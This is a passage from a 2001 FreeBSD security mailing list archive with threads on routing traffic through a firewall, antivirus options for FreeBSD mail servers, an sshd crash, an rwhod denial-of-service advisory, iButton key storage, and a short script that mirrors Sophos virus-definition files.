security@freebsd.org From: Lee Smallbone Subject: [OT?] - Central point router Reply-To: lee@kechara.net Organization: Kechara Internet X-Mailer: Opera 5.02 build 856a X-Priority: 3 (Normal) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I'm trying to set up a router (running freebsd) that will allow me to have all network traffic on one network segment run through this router. This is for purposes of applying global firewall rules, and also for traffic monitoring. My setup looks a little something like this: 62.xx.139.1 (internet) --- [telco supplied router] | | | [10/100 Switch] ----------- [firewall]-------(privately addressed LAN) / | \ [server 3] | \ 62.xx.139.6 | \ | \ | [server 1] [server 2] 62.xx.139.4 62.xx.139.5 What I'd like to be able to do is have a similar setup, but for it to look like this: 62.xx.139.1 (internet) --- [telco supplied router] | | | 62.xx.139.3 [10/100 Switch] ----------- [firewall]-------(privately addressed LAN) | | 62.xx.139.7 ========[router/firewall]========== / | \ [server 3] | \ 62.xx.139.6 | \ | \ | [server 1] [server 2] 62.xx.139.4 62.xx.139.5 How can I achieve this? Any traffic destined for say, 62.xx.139.5 would have to pass via 62.xx.139.7 first. Any help appreciated. -- Lee Smallbone Kechara Internet lee@kechara.net www.kechara.net Tel: (01243) 869 969 Fax: (01243) 866 685 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 9:33:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2]) by hub.freebsd.org (Postfix) with ESMTP id C795237B718 for ; Tue, 13 Mar 2001 09:33:32 -0800 (PST) (envelope-from lee@kechara.net) Received: from area57 (lan-fw.kechara.net [62.49.139.3]) by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id SAA10102 for ; Tue, 13 Mar 2001 18:43:33 GMT Message-Id: <200103131843.SAA10102@mailgate.kechara.net> Date: Tue, 13 Mar 2001 17:37:22 -0000 To: security@freebsd.org From: Lee Smallbone Subject: Re: [OT?] - Central point router Reply-To: lee@kechara.net Organization: Kechara Internet X-Mailer: Opera 5.02 build 856a X-Priority: 3 (Normal) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org That didn't come out too well... If anyone can help, please let me know (from the text description) and I'll mail you a txt attachment with a proper 'map'. Thanks. 13/03/2001 17:35:00, Lee Smallbone wrote: >Hi, > > I'm trying to set up a router (running freebsd) that will allow me to have > all network traffic on one network segment run through this router. This > is for purposes of applying global firewall rules, and also for traffic monitoring. > My setup looks a little something like this: > > 62.xx.139.1 >(internet) --- [telco supplied router] > | > | > | > [10/100 Switch] ----------- [firewall]-------(privately addressed LAN) > / | \ > [server 3] | \ > 62.xx.139.6 | \ > | \ > | [server 1] > [server 2] 62.xx.139.4 > 62.xx.139.5 > > >What I'd like to be able to do is have a similar setup, but for it to look like this: > > 62.xx.139.1 >(internet) --- [telco supplied router] > | > | > | 62.xx.139.3 > [10/100 Switch] ----------- [firewall]-------(privately addressed LAN) > | > | > 62.xx.139.7 > ========[router/firewall]========== > / | \ > [server 3] | \ > 62.xx.139.6 | \ > | \ > | [server 1] > [server 2] 62.xx.139.4 > 62.xx.139.5 > > How can I achieve this? Any traffic destined for say, 62.xx.139.5 would have to > pass via 62.xx.139.7 first. > > Any help appreciated. > >-- > >Lee Smallbone >Kechara Internet > >lee@kechara.net >www.kechara.net > >Tel: (01243) 869 969 >Fax: (01243) 866 685 > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > -- Lee Smallbone Kechara Internet lee@kechara.net www.kechara.net Tel: (01243) 869 969 Fax: (01243) 866 685 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 9:49:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from paperbox.gvpl.victoria.bc.ca (paperbox.gvpl.victoria.bc.ca [199.60.107.1]) by hub.freebsd.org (Postfix) with ESMTP id 1E82A37B718 for ; Tue, 13 Mar 2001 09:49:32 -0800 (PST) (envelope-from scampbel@gvpl.ca) Received: (from daemon@localhost) by paperbox.gvpl.victoria.bc.ca (8.9.3/8.9.3) id JAA61989; Tue, 13 Mar 2001 09:48:52 -0800 (PST) (envelope-from scampbel@gvpl.ca) Received: from pochta.gvpl.victoria.bc.ca(199.60.106.7) by paperbox.gvpl.victoria.bc.ca via smap (V2.1/2.1+anti-relay+anti-spam) id xma061892; Tue, 13 Mar 01 09:48:31 -0800 Received: from localhost (scampbel@localhost) by pochta.gvpl.victoria.bc.ca (8.11.1/8.11.1) with ESMTP id f2DHmXe26929; Tue, 13 Mar 2001 09:48:33 -0800 (PST) (envelope-from scampbel@pochta.gvpl.victoria.bc.ca) Date: Tue, 13 Mar 2001 09:48:33 -0800 (PST) From: Scott Campbell To: James Wyatt Cc: Will Mitayai Keeso Rowe , Subject: Re: Virus Scanning Software for FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 12 Mar 2001, James Wyatt wrote: > I have an eval copy of a product that looks promising: Sohpos antivirus. > > http://www.sophos.com/products/antivirus/savunix.html > > You can use the SAVI (API for virus checking) to scan email according to > the description at: > > http://www.sophos.com/products/antivirus/savi/ > > Their licensing looks fair and the sales person assigned to me has been > politely helpful and not overly insistant. Everything I've looked at so > far looks great, but the customer that wanted it has had delays and now > wants to wait for FreeBSD 4.3-RELEASE to install things on their server. > > Updates are monthly CDs and urgent updates are available as downloads. > > Our intent is to have it go after SMTP, HTTP, and FTP if we can and to > scan the Samba partitions for file infections. It handles uSoft Office > products like Word(tm) docs and such. > > Best of all, they support FreeBSD so we should support them, right? - Jy@ > I can't say enough good things about the Sophos product. We originally got it in April '99 and have been successfully stopping viruses ever since. It is running on our mail server (currently FreeBSD v4.2R, was 3.0Snap until March 1) and is still available in aout and elf versions. They have also added archive scanning inside numerous archive types. At the time it was the only major company to have a FreeBSD version (NAI was reported to have one but I couldn't track it down). I wrote my own script, instead of using Amavis, to work with Sendmail to virus scan. Another thing that I've set up is an automatic ide (virus identity) download from Sophos. You can ask for automatic email notification when they have written a new ide for a new virus (or variant). When that email arrives the new ide file is fetched and put into the sweep (their virus checking program) directory and used next time it is run (I batch my email scanning). Service and support questions have always been answered quickly and professionally. We also use it on all our Win95/98/Me/NT machines - they update themselves from a central server that is upgraded manually each month when the CD arrives. Scott E. Campbell _______________________________ Computer Operations Greater Victoria Public Library Victoria BC CANADA (250)382-7241 x230 scampbel@gvpl.ca > On Mon, 12 Mar 2001, Will Mitayai Keeso Rowe wrote: > > Is anyone aware of any virus scanning solutions for freebsd, particularly > > solutions for email? I don;t trust my users not to follow proper email > > guidelines, and thus would like to stop email at the server before they get > > delivered the message. > > > > Regards, > > Mit > > > > -- > > Will Mitayai Keeso Rowe > > > > For full contact information, please visit: > > http://my.infotriever.com/mitayai > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 10: 1: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from vbook.express.ru (vbook.express.ru [212.24.37.106]) by hub.freebsd.org (Postfix) with ESMTP id 1C3FF37B718 for ; Tue, 13 Mar 2001 10:01:01 -0800 (PST) (envelope-from vova@vbook.express.ru) Received: (from vova@localhost) by vbook.express.ru (8.9.3/8.9.3) id VAA27600; Tue, 13 Mar 2001 21:00:51 +0300 (MSK) (envelope-from vova) From: "Vladimir B. Grebenschikov" MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15022.24659.260945.39477@vbook.express.ru> Date: Tue, 13 Mar 2001 21:00:51 +0300 (MSK) To: Scott Campbell Cc: James Wyatt , Will Mitayai Keeso Rowe , Subject: Re: Virus Scanning Software for FreeBSD In-Reply-To: References: X-Mailer: VM 6.72 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Scott Campbell writes: > On Mon, 12 Mar 2001, James Wyatt wrote: > > > I have an eval copy of a product that looks promising: Sohpos antivirus. > > > > http://www.sophos.com/products/antivirus/savunix.html > > > > You can use the SAVI (API for virus checking) to scan email according to > > the description at: > > > > http://www.sophos.com/products/antivirus/savi/ > > > > Their licensing looks fair and the sales person assigned to me has been > > politely helpful and not overly insistant. Everything I've looked at so > > far looks great, but the customer that wanted it has had delays and now > > wants to wait for FreeBSD 4.3-RELEASE to install things on their server. > > > > Updates are monthly CDs and urgent updates are available as downloads. > > > > Our intent is to have it go after SMTP, HTTP, and FTP if we can and to > > scan the Samba partitions for file infections. It handles uSoft Office > > products like Word(tm) docs and such. > > > > Best of all, they support FreeBSD so we should support them, right? - Jy@ > > > > I can't say enough good things about the Sophos product. We originally > got it in April '99 and have been successfully stopping viruses ever > since. It is running on our mail server (currently FreeBSD v4.2R, was > 3.0Snap until March 1) and is still available in aout and elf versions. > They have also added archive scanning inside numerous archive types. At > the time it was the only major company to have a FreeBSD version (NAI was > reported to have one but I couldn't track it down). I wrote my own > script, instead of using Amavis, to work with Sendmail to virus scan. > Another thing that I've set up is an automatic ide (virus identity) > download from Sophos. You can ask for automatic email notification when > they have written a new ide for a new virus (or variant). When that > email arrives the new ide file is fetched and put into the sweep (their > virus checking program) directory and used next time it is run (I batch > my email scanning). Service and support questions have always been > answered quickly and professionally. > > We also use it on all our Win95/98/Me/NT machines - they update themselves > from a central server that is upgraded manually each month when the CD > arrives. There are avp software ftp://downloads1.kaspersky-labs.com/products/avp_unix/freebsd/ Info about product you can get from: http://www.avp.ru/ Product have possibility to run in daemon mode (checks files sent via unix domain socket) > Scott E. Campbell -- TSB Russian Express, Moscow Vladimir B. Grebenschikov, vova@express.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 10:37:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id A48B737B718 for ; Tue, 13 Mar 2001 10:37:33 -0800 (PST) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f2DIbe513255 for ; Tue, 13 Mar 2001 13:37:40 -0500 (EST) (envelope-from rsimmons@wlcg.com) Date: Tue, 13 Mar 2001 13:37:35 -0500 (EST) From: Rob Simmons To: Subject: sshd core Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I was wondering if someone had a patch for the sshd problem when someone tries to login with a non-existant account? If so, has it been commited yet? Robert Simmons Systems Administrator http://www.wlcg.com/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6rmj0v8Bofna59hYRAvpdAJ9Vn3d9yiFApvgzZ7NgyoVVASlM/wCfdEpL xHTk/6MO5zDCzUtFV9tKqBM= =iZI+ -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 10:47:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id 828F737B718 for ; Tue, 13 Mar 2001 10:47:20 -0800 (PST) (envelope-from mike@sentex.net) Received: from simoeon.sentex.net (simeon.sentex.ca [209.112.4.47]) by smtp1.sentex.ca (8.11.2/8.11.1) with ESMTP id f2DIl5656018; Tue, 13 Mar 2001 13:47:05 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.0.2.1.0.20010313134057.040dfa70@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.0.2 Date: Tue, 13 Mar 2001 13:41:06 -0500 To: Rob Simmons , From: Mike Tancsa Subject: Re: sshd core In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org See the open PR. ---Mike At 01:37 PM 3/13/01 -0500, Rob Simmons wrote: >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >I was wondering if someone had a patch for the sshd problem when someone >tries to login with a non-existant account? If so, has it been commited >yet? > >Robert Simmons >Systems Administrator >http://www.wlcg.com/ >-----BEGIN PGP SIGNATURE----- >Version: GnuPG v1.0.4 (FreeBSD) >Comment: For info see http://www.gnupg.org > >iD8DBQE6rmj0v8Bofna59hYRAvpdAJ9Vn3d9yiFApvgzZ7NgyoVVASlM/wCfdEpL >xHTk/6MO5zDCzUtFV9tKqBM= >=iZI+ >-----END PGP SIGNATURE----- > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 13:52:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-59.dsl.lsan03.pacbell.net [63.207.60.59]) by hub.freebsd.org (Postfix) with ESMTP id 623DC37B718 for ; Tue, 13 Mar 2001 13:52:06 -0800 (PST) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 185BA66B6C; Tue, 13 Mar 2001 13:52:06 -0800 (PST) Date: Tue, 13 Mar 2001 13:52:06 -0800 From: Kris Kennaway To: Garrett Wollman Cc: security@FreeBSD.ORG Subject: Re: rwhod Message-ID: <20010313135205.A17955@mollari.cthul.hu> References: <200103122347.f2CNlxT28110@freefall.freebsd.org> <200103131644.LAA73764@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="3MwIy2ne0vdjdPXF" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200103131644.LAA73764@khavrinen.lcs.mit.edu>; from wollman@khavrinen.lcs.mit.edu on Tue, Mar 13, 2001 at 11:44:24AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --3MwIy2ne0vdjdPXF Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Mar 13, 2001 at 11:44:24AM -0500, Garrett Wollman wrote: > < said: >=20 > > Remote users can cause the rwhod daemon to crash, denying service to > > clients. >=20 > It's worth noting that most people who run `rwhod' use it only for > ``tourist information'' anyway and do not actually depend on the > information it provides. I run it on my servers so that the nightly > reports will include the summary of uptimes and load averages, but if > one daemon goes AWOL I'll not be particularly concerned. >=20 > If, on the other hand, this bug is actually exploitable, that would be > much more serious (and would warrant a reissue of the advisory). Yeah, it's pretty tame..but still worth reporting (instances where daemons can be remotely induced to crash are a class of bug we report in advisories, reliability is a component of security, etc :-) Kris --3MwIy2ne0vdjdPXF Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6rpaFWry0BWjoQKURAhHYAKDNT5fwy+mGZASyFWcg6bRpppOYCQCbBpzj oc4Yoanmtbf2MU7x9WFVbso= =hrQ5 -----END PGP SIGNATURE----- --3MwIy2ne0vdjdPXF-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 13:57:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from dell.dannyland.org (dell.dannyland.org [64.81.36.13]) by hub.freebsd.org (Postfix) with ESMTP id EE38537B71D for ; Tue, 13 Mar 2001 13:57:33 -0800 (PST) (envelope-from dannyman@toldme.com) Received: by dell.dannyland.org (Postfix, from userid 1001) id 10A505BF7; Tue, 13 Mar 2001 13:57:42 -0800 (PST) Date: Tue, 13 Mar 2001 13:57:41 -0800 From: dannyman To: James Wyatt Cc: Will Mitayai Keeso Rowe , freebsd-security@freebsd.org Subject: Re: Virus Scanning Software for FreeBSD Message-ID: <20010313135741.I3500@dell.dannyland.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from jwyatt@rwsystems.net on Mon, Mar 12, 2001 at 09:04:02PM -0600 X-Loop: djhoward@uiuc.edu X-URL: http://www.dannyland.org/~dannyman/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Mar 12, 2001 at 09:04:02PM -0600, James Wyatt wrote: > I have an eval copy of a product that looks promising: Sohpos antivirus. > > http://www.sophos.com/products/antivirus/savunix.html I have been using Amavis and Sophos together for a while now. I must say that Sophos have been good to us. [...] > Updates are monthly CDs and urgent updates are available as downloads. I have a cron that runs every five minutes to grab the latest identities from their web site. We are very secure against even the trendy virii, and it is kind of fun to respond to a ticket from a well-meaning user warning us of a new virus that "we have been scanning for this virus since 9:30AM yesterday." :) If anyone wants the script, e-mail me. > Our intent is to have it go after SMTP, HTTP, and FTP if we can and to > scan the Samba partitions for file infections. It handles uSoft Office > products like Word(tm) docs and such. It can open archives and stuff too. I haven't used Intercheck yet, but that looks like a very clever idea - your Windows clients contact the unix server for virus identity updates. > Best of all, they support FreeBSD so we should support them, right? - Jy@ Amen. They seem pretty sucessfully multi-platform. Were they truly clever they'd submit a port so you could eval their software. :) -danny To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 14: 7:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id A992F37B719 for ; Tue, 13 Mar 2001 14:07:37 -0800 (PST) (envelope-from adam@algroup.co.uk) Received: from algroup.co.uk ([192.168.192.1]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id QAA09385; Tue, 13 Mar 2001 16:16:15 GMT Message-ID: <3AAE4798.C7C457E4@algroup.co.uk> Date: Tue, 13 Mar 2001 16:15:20 +0000 From: Adam Laurie X-Mailer: Mozilla 4.7 [en-gb] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Poul-Henning Kamp Cc: Terje Elde , Daniel Hagan , freebsd-security@FreeBSD.ORG Subject: Re: iButton Development References: <7857.984495569@critter> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Poul-Henning Kamp wrote: > > My share in this is mostly the monitoring gadgets with the 1wire > products, but given working software I would probably put my pgp > key somewhere more safe as well. the iblab test programs provide enough functionality to do this... a very simple setup is: create a new pgp private key for your laptop. use it to encrypt your "real" pgp keyring/ssh keys/whatever and copy the resulting file to the ibutton. you only EVER use the new keypair for this purpose. when you need to use your real key, you copy it back of the ibutton, onto ramdisk, decrypt it, use it, blow away your ramdisk (all nicely wrapped in a shellscript of course)... this way, you can take your laptop and your ibutton on the road with you... if you lose the ibutton it doesn't matter because it's encrypted with a one-time throw away key that only exists on your laptop, which you immediately delete. if you lose your laptop, you've lost a key that was only ever used to encrypt something on your ibutton which you now overwrite with a new one. this assumes, of course, that you've stored your "real" original keys somewhere *really* safe... deep underground, blast doors, bullet proof glass, etc. etc... you know the kind of thing.... :) cheers, Adam -- Adam Laurie Tel: +44 (20) 8742 0755 A.L. Digital Ltd. Fax: +44 (20) 8742 5995 Voysey House http://www.thebunker.net Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 14: 7:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id 9771137B71A for ; Tue, 13 Mar 2001 14:07:39 -0800 (PST) (envelope-from adam@algroup.co.uk) Received: from algroup.co.uk ([192.168.192.1]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id OAA09186; Tue, 13 Mar 2001 14:20:05 GMT Message-ID: <3AAE2C6C.D06A0E88@algroup.co.uk> Date: Tue, 13 Mar 2001 14:19:24 +0000 From: Adam Laurie X-Mailer: Mozilla 4.7 [en-gb] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Poul-Henning Kamp Cc: Daniel Hagan , freebsd-security@FreeBSD.ORG, iblab@aldigital.co.uk Subject: Re: iButton Development References: <6940.984490034@critter> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Poul-Henning Kamp wrote: > > In message <3AADB1D3.C70E00C@colltech.com>, Daniel Hagan writes: > >There was some discussion regarding iButtons in mid-Jan on this list. > >I'm interested in getting one or more of these things to play with, with > >the goal of: > > The best I can suggest you is that we rally all efforts > around: > http://anoncvs.aldigital.co.uk/iBLab/ > we would certainly welcome any input and will incoporate any useful code back into the project. cheers, Adam -- Adam Laurie Tel: +44 (20) 8742 0755 A.L. Digital Ltd. Fax: +44 (20) 8742 5995 Voysey House http://www.thebunker.net Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 15:15:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from dell.dannyland.org (dell.dannyland.org [64.81.36.13]) by hub.freebsd.org (Postfix) with ESMTP id 4628537B719 for ; Tue, 13 Mar 2001 15:15:04 -0800 (PST) (envelope-from dannyman@toldme.com) Received: by dell.dannyland.org (Postfix, from userid 1001) id A51315BF7; Tue, 13 Mar 2001 15:15:12 -0800 (PST) Date: Tue, 13 Mar 2001 15:15:12 -0800 From: dannyman To: freebsd-security@freebsd.org Subject: Sophos "idefetch" script Message-ID: <20010313151512.Q3500@dell.dannyland.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i X-Loop: djhoward@uiuc.edu X-URL: http://www.dannyland.org/~dannyman/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Wow, got three responses right away asking for my script to fetch updated IDE files from Sophos' web site. Which it turns out is seven lines of sh, and now thirty-some lines of Tellme Open Source License. :) http://www.dannyland.org/~dannyman/warez/idefetch If you can make it better, please share. ;) -danny To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 15:43:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from dell.dannyland.org (dell.dannyland.org [64.81.36.13]) by hub.freebsd.org (Postfix) with ESMTP id E60C537B718 for ; Tue, 13 Mar 2001 15:43:41 -0800 (PST) (envelope-from dannyman@toldme.com) Received: by dell.dannyland.org (Postfix, from userid 1001) id DBA455BF7; Tue, 13 Mar 2001 15:43:49 -0800 (PST) Date: Tue, 13 Mar 2001 15:43:49 -0800 From: dannyman To: freebsd-security@freebsd.org Subject: Re: Sophos "idefetch" script Message-ID: <20010313154349.W3500@dell.dannyland.org> References: <20010313151512.Q3500@dell.dannyland.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20010313151512.Q3500@dell.dannyland.org>; from dannyman@toldme.com on Tue, Mar 13, 2001 at 03:15:12PM -0800 X-Loop: djhoward@uiuc.edu X-URL: http://www.dannyland.org/~dannyman/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Okay ... So, I added a note about how fetch -m means "mirror" but the other important thing to note is this is just a simple little brain-dead mirror script, and the true magic comes from http://www.amavis.org/ so you can scan e-mail. ;) -danny To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 16: 4: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 585B037B718 for ; Tue, 13 Mar 2001 16:04:03 -0800 (PST) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id BAA51503; Wed, 14 Mar 2001 01:03:59 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: dannyman Cc: freebsd-security@FreeBSD.ORG Subject: Re: Sophos "idefetch" script References: <20010313151512.Q3500@dell.dannyland.org> From: Dag-Erling Smorgrav Date: 14 Mar 2001 01:03:58 +0100 In-Reply-To: dannyman's message of "Tue, 13 Mar 2001 15:15:12 -0800" Message-ID: Lines: 17 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org dannyman writes: > http://www.dannyland.org/~dannyman/warez/idefetch > > If you can make it better, please share. ;) Try this on for size: idesite="http://www.sophos.com/downloads/ide/" idedir="/usr/local/sav" fetch="/usr/bin/fetch" ${fetch} -q -o - "${idesite}list.txt" | cut -c 37- | while read d ; do ${fetch} -m -q -o ${idedir} "${idesite}${d}" done DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 16:10:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from dell.dannyland.org (dell.dannyland.org [64.81.36.13]) by hub.freebsd.org (Postfix) with ESMTP id 59F8B37B718 for ; Tue, 13 Mar 2001 16:10:09 -0800 (PST) (envelope-from dannyman@toldme.com) Received: by dell.dannyland.org (Postfix, from userid 1001) id E15865BF7; Tue, 13 Mar 2001 16:10:17 -0800 (PST) Date: Tue, 13 Mar 2001 16:10:17 -0800 From: dannyman To: Dag-Erling Smorgrav Cc: freebsd-security@FreeBSD.ORG Subject: Re: Sophos "idefetch" script Message-ID: <20010313161017.Z3500@dell.dannyland.org> References: <20010313151512.Q3500@dell.dannyland.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from des@ofug.org on Wed, Mar 14, 2001 at 01:03:58AM +0100 X-Loop: djhoward@uiuc.edu X-URL: http://www.dannyland.org/~dannyman/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Mar 14, 2001 at 01:03:58AM +0100, Dag-Erling Smorgrav wrote: > dannyman writes: > > http://www.dannyland.org/~dannyman/warez/idefetch > > > > If you can make it better, please share. ;) > > Try this on for size: > > idesite="http://www.sophos.com/downloads/ide/" > idedir="/usr/local/sav" > fetch="/usr/bin/fetch" > ${fetch} -q -o - "${idesite}list.txt" | cut -c 37- | while read d ; do > ${fetch} -m -q -o ${idedir} "${idesite}${d}" > done DES: Is this addendum to the script okay by you? ;) # >>>>>> SNIP HERE IF YOU ARE 31337 <<<<<< # If you want, use this from Dag-Erling Smorgrav # (You can use the below without including the Tellme license ;) #Try this on for size: # #idesite="http://www.sophos.com/downloads/ide/" #idedir="/usr/local/sav" #fetch="/usr/bin/fetch" #${fetch} -q -o - "${idesite}list.txt" | cut -c 37- | while read d ; do # ${fetch} -m -q -o ${idedir} "${idesite}${d}" #done To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 16:40:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 9161E37B71B for ; Tue, 13 Mar 2001 16:40:20 -0800 (PST) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id BAA51694; Wed, 14 Mar 2001 01:40:16 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: dannyman Cc: freebsd-security@FreeBSD.ORG Subject: Re: Sophos "idefetch" script References: <20010313151512.Q3500@dell.dannyland.org> <20010313161017.Z3500@dell.dannyland.org> From: Dag-Erling Smorgrav Date: 14 Mar 2001 01:40:15 +0100 In-Reply-To: dannyman's message of "Tue, 13 Mar 2001 16:10:17 -0800" Message-ID: Lines: 25 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org dannyman writes: > Is this addendum to the 